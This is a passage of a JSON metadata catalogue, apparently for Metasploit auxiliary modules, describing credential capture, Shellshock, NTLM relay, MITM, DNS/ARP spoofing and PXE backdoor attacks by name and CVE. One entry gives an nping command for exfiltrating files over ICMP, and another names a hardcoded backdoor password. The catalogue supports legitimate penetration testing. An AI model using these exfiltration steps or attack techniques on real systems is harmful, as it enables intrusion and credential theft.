"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/smtp.rb",
"is_install_path": true,
"ref_name": "server/capture/smtp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/telnet": {
"name": "Authentication Capture: Telnet",
"full_name": "auxiliary/server/capture/telnet",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module provides a fake Telnet service that\n is designed to capture authentication credentials. DONTs\n and WONTs are sent to the client for all option negotiations,\n except for ECHO at the time of the password prompt since\n the server controls that for a bit more realism.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:02:33 +0000",
"path": "/modules/auxiliary/server/capture/telnet.rb",
"is_install_path": true,
"ref_name": "server/capture/telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/vnc": {
"name": "Authentication Capture: VNC",
"full_name": "auxiliary/server/capture/vnc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake VNC service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-15 17:01:52 +0000",
"path": "/modules/auxiliary/server/capture/vnc.rb",
"is_install_path": true,
"ref_name": "server/capture/vnc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dhclient_bash_env": {
"name": "DHCP Client Bash Environment Variable Code Injection (Shellshock)",
"full_name": "auxiliary/server/dhclient_bash_env",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "auxiliary",
"author": [
"scriptjunkie",
"apconole <apconole@yahoo.com>",
"Stephane Chazelas",
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/auxiliary/server/dhclient_bash_env.rb",
"is_install_path": true,
"ref_name": "server/dhclient_bash_env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"auxiliary_server/dhcp": {
"name": "DHCP Server",
"full_name": "auxiliary/server/dhcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"scriptjunkie",
"apconole <apconole@yahoo.com>"
],
"description": "This module provides a DHCP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/dhcp.rb",
"is_install_path": true,
"ref_name": "server/dhcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dns/native_server": {
"name": "Native DNS Server (Example)",
"full_name": "auxiliary/server/dns/native_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module provides a Rex based DNS service which can store static entries,\n resolve names over pivots, and serve DNS requests across routed session comms.\n DNS tunnels can operate across the the Rex switchboard, and DNS other modules\n can use this as a template. Setting static records via hostfile allows for DNS\n spoofing attacks without direct traffic manipulation at the handlers. handlers\n for requests and responses provided here mimic the internal Rex functionality,\n but utilize methods within this module's namespace to output content processed\n in the Proc contexts via vprint_status.",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
53
],
"autofilter_services": [
"dns"
],
"targets": null,
"mod_time": "2018-01-22 23:37:39 +0000",
"path": "/modules/auxiliary/server/dns/native_server.rb",
"is_install_path": true,
"ref_name": "server/dns/native_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dns/spoofhelper": {
"name": "DNS Spoofing Helper Service",
"full_name": "auxiliary/server/dns/spoofhelper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"ddz <ddz@theta44.org>"
],
"description": "This module provides a DNS service that returns TXT\n records indicating information about the querying service.\n Based on Dino Dai Zovi DNS code from Karma.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/dns/spoofhelper.rb",
"is_install_path": true,
"ref_name": "server/dns/spoofhelper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/fakedns": {
"name": "Fake DNS Service",
"full_name": "auxiliary/server/fakedns",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>",
"fozavci"
],
"description": "This module provides a DNS service that redirects\n all queries to a particular address.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/fakedns.rb",
"is_install_path": true,
"ref_name": "server/fakedns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/ftp": {
"name": "FTP File Server",
"full_name": "auxiliary/server/ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides a FTP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/ftp.rb",
"is_install_path": true,
"ref_name": "server/ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/http_ntlmrelay": {
"name": "HTTP Client MS Credential Relayer",
"full_name": "auxiliary/server/http_ntlmrelay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Lundeen <richard.lundeen@gmail.com>"
],
"description": "This module relays negotiated NTLM Credentials from an HTTP server to multiple\n protocols. Currently, this module supports relaying to SMB and HTTP.\n\n Complicated custom attacks requiring multiple requests that depend on each\n other can be written using the SYNC* options. For example, a CSRF-style\n attack might first set an HTTP_GET request with a unique SNYNCID and set\n an HTTP_POST request with a SYNCFILE, which contains logic to look\n through the database and parse out important values, such as the CSRF token\n or authentication cookies, setting these as configuration options, and finally\n create a web page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-18 11:33:48 +0000",
"path": "/modules/auxiliary/server/http_ntlmrelay.rb",
"is_install_path": true,
"ref_name": "server/http_ntlmrelay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/icmp_exfil": {
"name": "ICMP Exfiltration Service",
"full_name": "auxiliary/server/icmp_exfil",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module is designed to provide a server-side component to receive and store files\n exfiltrated over ICMP echo request packets.\n\n To use this module you will need to send an initial ICMP echo request containing the\n specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or\n a random filename can be assigned). All data received from this source will automatically\n be added to the receive buffer until an ICMP echo request containing a specific end trigger\n (defaults to '^EOL') is received.\n\n Suggested Client:\n Data can be sent from the client using a variety of tools. One such example is nping (included\n with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string \"BOFtest.txt\" -c1",
"references": [
"URL-https://github.com/todb/packetfu",
"URL-http://nmap.org/book/nping-man.html",
"URL-http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/server/icmp_exfil.rb",
"is_install_path": true,
"ref_name": "server/icmp_exfil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/jsse_skiptls_mitm_proxy": {
"name": "Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy",
"full_name": "auxiliary/server/jsse_skiptls_mitm_proxy",
"rank": 300,
"disclosure_date": "2015-01-20",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits an incomplete internal state distinction in Java Secure\n Socket Extension (JSSE) by impersonating the server and finishing the\n handshake before the peers have authenticated themselves and instantiated\n negotiated security parameters, resulting in a plaintext SSL/TLS session\n with the client. This plaintext SSL/TLS session is then proxied to the\n server using a second SSL/TLS session from the proxy to the server (or an\n alternate fake server) allowing the session to continue normally and\n plaintext application data transmitted between the peers to be saved. This\n module requires an active man-in-the-middle attack.",
"references": [
"CVE-2014-6593",
"CWE-372",
"URL-https://www.smacktls.com/#skip",
"URL-https://www.smacktls.com/smack.pdf",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html",
"URL-https://www-304.ibm.com/support/docview.wss?uid=swg21695474"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb",
"is_install_path": true,
"ref_name": "server/jsse_skiptls_mitm_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/local_hwbridge": {
"name": "Hardware Bridge Server",
"full_name": "auxiliary/server/local_hwbridge",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Craig Smith"
],
"description": "This module sets up a web server to bridge communications between\n Metasploit and physically attached hardware.\n Currently this module supports: automotive",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-14 09:28:38 +0000",
"path": "/modules/auxiliary/server/local_hwbridge.rb",
"is_install_path": true,
"ref_name": "server/local_hwbridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/ms15_134_mcl_leak": {
"name": "MS15-134 Microsoft Windows Media Center MCL Information Disclosure",
"full_name": "auxiliary/server/ms15_134_mcl_leak",
"rank": 300,
"disclosure_date": "2015-12-08",
"type": "auxiliary",
"author": [
"Francisco Falcon",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Media Center. It allows an MCL\n file to render itself as an HTML document in the local machine zone by Internet Explorer,\n which can be used to leak files on the target machine.\n\n Please be aware that if this exploit is used against a patched Windows, it can cause the\n computer to be very slow or unresponsive (100% CPU). It seems to be related to how the\n exploit uses the URL attribute in order to render itself as an HTML file.",
"references": [
"CVE-2015-6127",
"MSB-MS15-134",
"URL-https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/",
"URL-http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/ms15_134_mcl_leak.rb",
"is_install_path": true,
"ref_name": "server/ms15_134_mcl_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/netbios_spoof_nat": {
"name": "NetBIOS Response \"BadTunnel\" Brute Force Spoof (NAT Tunnel)",
"full_name": "auxiliary/server/netbios_spoof_nat",
"rank": 300,
"disclosure_date": "2016-06-14",
"type": "auxiliary",
"author": [
"vvalien",
"hdm <x@hdm.io>",
"tombkeeper"
],
"description": "This module listens for a NetBIOS name request and then continuously spams\n NetBIOS responses to a target for given hostname, causing the target to cache\n a malicious address for this name. On high-speed networks, the PPSRATE value\n should be increased to speed up this attack. As an example, a value of around\n 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup.\n Distant targets may require more time and lower rates for a successful attack.\n\n This module works when the target is behind a NAT gateway, since the stream of\n NetBIOS responses will keep the NAT mapping alive after the initial setup. To\n trigger the initial NetBIOS request to the Metasploit system, force the target\n to access a UNC link pointing to the same address (HTML, Office attachment, etc).\n\n This NAT-piercing issue was named the 'BadTunnel' vulnerability by the discoverer,\n Yu Yang (@tombkeeper). The Microsoft patches (MS16-063/MS16-077) impact the way\n that the proxy host (WPAD) host is identified, but do change the predictability\n of NetBIOS requests.",
"references": [
"URL-http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/",
"CVE-2016-3213",
"MSB-MS16-063",
"CVE-2016-3236",
"MSB-MS16-077"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/netbios_spoof_nat.rb",
"is_install_path": true,
"ref_name": "server/netbios_spoof_nat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/openssl_altchainsforgery_mitm_proxy": {
"name": "OpenSSL Alternative Chains Certificate Forgery MITM Proxy",
"full_name": "auxiliary/server/openssl_altchainsforgery_mitm_proxy",
"rank": 300,
"disclosure_date": "2015-07-09",
"type": "auxiliary",
"author": [
"David Benjamin",
"Adam Langley",
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a logic error in OpenSSL by impersonating the server\n and sending a specially-crafted chain of certificates, resulting in\n certain checks on untrusted certificates to be bypassed on the client,\n allowing it to use a valid leaf certificate as a CA certificate to sign a\n fake certificate. The SSL/TLS session is then proxied to the server\n allowing the session to continue normally and application data transmitted\n between the peers to be saved.\n\n The valid leaf certificate must not contain the keyUsage extension or it\n must have at least the keyCertSign bit set (see X509_check_issued function\n in crypto/x509v3/v3_purp.c); otherwise; X509_verify_cert fails with\n X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. This module requires an\n active man-in-the-middle attack.",
"references": [
"CVE-2015-1793",
"CWE-754",
"URL-http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb",
"is_install_path": true,
"ref_name": "server/openssl_altchainsforgery_mitm_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/openssl_heartbeat_client_memory": {
"name": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure",
"full_name": "auxiliary/server/openssl_heartbeat_client_memory",
"rank": 300,
"disclosure_date": "2014-04-07",
"type": "auxiliary",
"author": [
"Neel Mehta",
"Riku",
"Antti",
"Matti",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.",
"references": [
"CVE-2014-0160",
"US-CERT-VU-720951",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-098A",
"URL-http://heartbleed.com/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/server/openssl_heartbeat_client_memory.rb",
"is_install_path": true,
"ref_name": "server/openssl_heartbeat_client_memory",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Heartbleed"
]
}
},
"auxiliary_server/pxeexploit": {
"name": "PXE Boot Exploit Server",
"full_name": "auxiliary/server/pxeexploit",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/pxeexploit.rb",
"is_install_path": true,
"ref_name": "server/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/regsvr32_command_delivery_server": {
"name": "Regsvr32.exe (.sct) Command Delivery Server",
"full_name": "auxiliary/server/regsvr32_command_delivery_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Casey Smith",
"Trenton Ivey",
"mubix <mubix@hak5.org>"
],
"description": "This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on\n a target system. The major advantage of this technique is that you can execute a static command on the target\n system and dynamically and remotely change the command that will actually run (by changing the value of CMD).\n This is useful when combined with persistence methods (e.g., a recurring scheduled task) or when flexibility\n is needed through the use of a single command (e.g., as Rubber Ducky payload).",
"references": [
"URL-http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/regsvr32_command_delivery_server.rb",
"is_install_path": true,
"ref_name": "server/regsvr32_command_delivery_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks4a": {
"name": "Socks4a Proxy Server",
"full_name": "auxiliary/server/socks4a",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/socks4a.rb",
"is_install_path": true,
"ref_name": "server/socks4a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks5": {
"name": "Socks5 Proxy Server",
"full_name": "auxiliary/server/socks5",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"Spencer McIntyre",
"surefire"
],
"description": "This module provides a socks5 proxy server that uses the builtin\n Metasploit routing to relay connections.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-26 13:46:00 +0000",
"path": "/modules/auxiliary/server/socks5.rb",
"is_install_path": true,
"ref_name": "server/socks5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks_unc": {
"name": "SOCKS Proxy UNC Path Redirection",
"full_name": "auxiliary/server/socks_unc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides a Socks proxy service\n that redirects all HTTP requests to a web page that\n loads a UNC path.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/socks_unc.rb",
"is_install_path": true,
"ref_name": "server/socks_unc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/tftp": {
"name": "TFTP File Server",
"full_name": "auxiliary/server/tftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "This module provides a TFTP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/tftp.rb",
"is_install_path": true,
"ref_name": "server/tftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/webkit_xslt_dropper": {
"name": "Cross Platform Webkit File Dropper",
"full_name": "auxiliary/server/webkit_xslt_dropper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicolas Gregoire"
],
"description": "This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8\n files to the target file-system. By default, the file will be dropped in\n C:\\Program Files\\",
"references": [
"CVE-2011-1774"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/server/webkit_xslt_dropper.rb",
"is_install_path": true,
"ref_name": "server/webkit_xslt_dropper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/wget_symlink_file_write": {
"name": "GNU Wget FTP Symlink Arbitrary Filesystem Access",
"full_name": "auxiliary/server/wget_symlink_file_write",
"rank": 300,
"disclosure_date": "2014-10-27",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in Wget when used in\n recursive (-r) mode with a FTP server as a destination. A\n symlink is used to allow arbitrary writes to the target's\n filesystem. To specify content for the file, use the\n \"file:/path\" syntax for the TARGET_DATA option.\n\n Tested successfully with wget 1.14. Versions prior to 1.16\n are presumed vulnerable.",
"references": [
"CVE-2014-4877",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
"is_install_path": true,
"ref_name": "server/wget_symlink_file_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/wpad": {
"name": "WPAD.dat File Server",
"full_name": "auxiliary/server/wpad",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module generates a valid wpad.dat file for WPAD mitm\n attacks. Usually this module is used in combination with DNS attacks\n or the 'NetBIOS Name Service Spoofer' module. Please remember as the\n server will be running by default on TCP port 80 you will need the\n required privileges to open that port.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/wpad.rb",
"is_install_path": true,
"ref_name": "server/wpad",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sniffer/psnuffle": {
"name": "pSnuffle Packet Sniffer",
"full_name": "auxiliary/sniffer/psnuffle",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Moser <mmo@remote-exploit.org>"
],
"description": "This module sniffs passwords like dsniff did in the past",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/sniffer/psnuffle.rb",
"is_install_path": true,
"ref_name": "sniffer/psnuffle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/arp/arp_poisoning": {
"name": "ARP Spoof",
"full_name": "auxiliary/spoof/arp/arp_poisoning",
"rank": 300,
"disclosure_date": "1999-12-22",
"type": "auxiliary",
"author": [
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service.",
"references": [
"OSVDB-11169",
"CVE-1999-0667",
"URL-http://en.wikipedia.org/wiki/ARP_spoofing"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/spoof/arp/arp_poisoning.rb",
"is_install_path": true,
"ref_name": "spoof/arp/arp_poisoning",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/cisco/cdp": {
"name": "Send Cisco Discovery Protocol (CDP) Packets",
"full_name": "auxiliary/spoof/cisco/cdp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Fatih Ozavci"
],
"description": "This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses\n to the CDP packets broadcast from this module will need to be analyzed with an\n external packet analysis tool, such as tcpdump or Wireshark in order to learn more\n about the Cisco switch and router environment.",
"references": [
"URL-http://en.wikipedia.org/wiki/CDP_Spoofing"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/cisco/cdp.rb",
"is_install_path": true,
"ref_name": "spoof/cisco/cdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/cisco/dtp": {
"name": "Forge Cisco DTP Packets",
"full_name": "auxiliary/spoof/cisco/dtp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Spencer McIntyre"
],
"description": "This module forges DTP packets to initialize a trunk port.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/cisco/dtp.rb",
"is_install_path": true,
"ref_name": "spoof/cisco/dtp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/bailiwicked_domain": {
"name": "DNS BailiWicked Domain Attack",
"full_name": "auxiliary/spoof/dns/bailiwicked_domain",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>",
"hdm <x@hdm.io>",
"Cedric Blancher <sid@rstack.org>"
],
"description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\n domains nameserver entries in a vulnerable DNS cache server. This attack works\n by sending random hostname queries to the target DNS server coupled with spoofed\n replies to those queries from the authoritative nameservers for that domain.\n Eventually, a guessed ID will match, the spoofed packet will get accepted, and\n the nameserver entries for the target domain will be replaced by the server\n specified in the NEWDNS option of this exploit.",
"references": [
"CVE-2008-1447",
"OSVDB-46776",
"US-CERT-VU-800113",
"URL-http://www.caughq.org/exploits/CAU-EX-2008-0003.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/dns/bailiwicked_domain.rb",
"is_install_path": true,
"ref_name": "spoof/dns/bailiwicked_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/bailiwicked_host": {
"name": "DNS BailiWicked Host Attack",
"full_name": "auxiliary/spoof/dns/bailiwicked_host",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>",
"hdm <x@hdm.io>"
],
"description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single\n malicious host entry into the target nameserver by sending random hostname\n queries to the target DNS server coupled with spoofed replies to those\n queries from the authoritative nameservers for that domain. Eventually, a\n guessed ID will match, the spoofed packet will get accepted, and due to the\n additional hostname entry being within bailiwick constraints of the original\n request the malicious host entry will get cached.",
"references": [
"CVE-2008-1447",
"OSVDB-46776",
"US-CERT-VU-800113",
"URL-http://www.caughq.org/exploits/CAU-EX-2008-0002.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/dns/bailiwicked_host.rb",
"is_install_path": true,
"ref_name": "spoof/dns/bailiwicked_host",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/compare_results": {
"name": "DNS Lookup Result Comparison",
"full_name": "auxiliary/spoof/dns/compare_results",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to determine differences\n in the cache entries between two DNS servers. This is\n primarily useful for detecting cache poisoning attacks,\n but can also be used to detect geo-location load balancing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
